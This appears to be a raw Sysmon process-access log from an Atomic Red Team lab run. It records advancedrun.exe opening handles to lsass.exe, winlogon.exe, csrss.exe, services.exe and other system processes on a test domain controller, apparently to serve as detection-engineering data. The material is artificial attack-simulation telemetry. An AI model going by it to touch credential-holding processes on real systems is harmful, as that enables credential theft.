17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983043Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983042Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983041Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983039Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983038Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983037Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983036Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983035Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983034Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983033Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983032Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983030Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983029Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983028Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983027Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 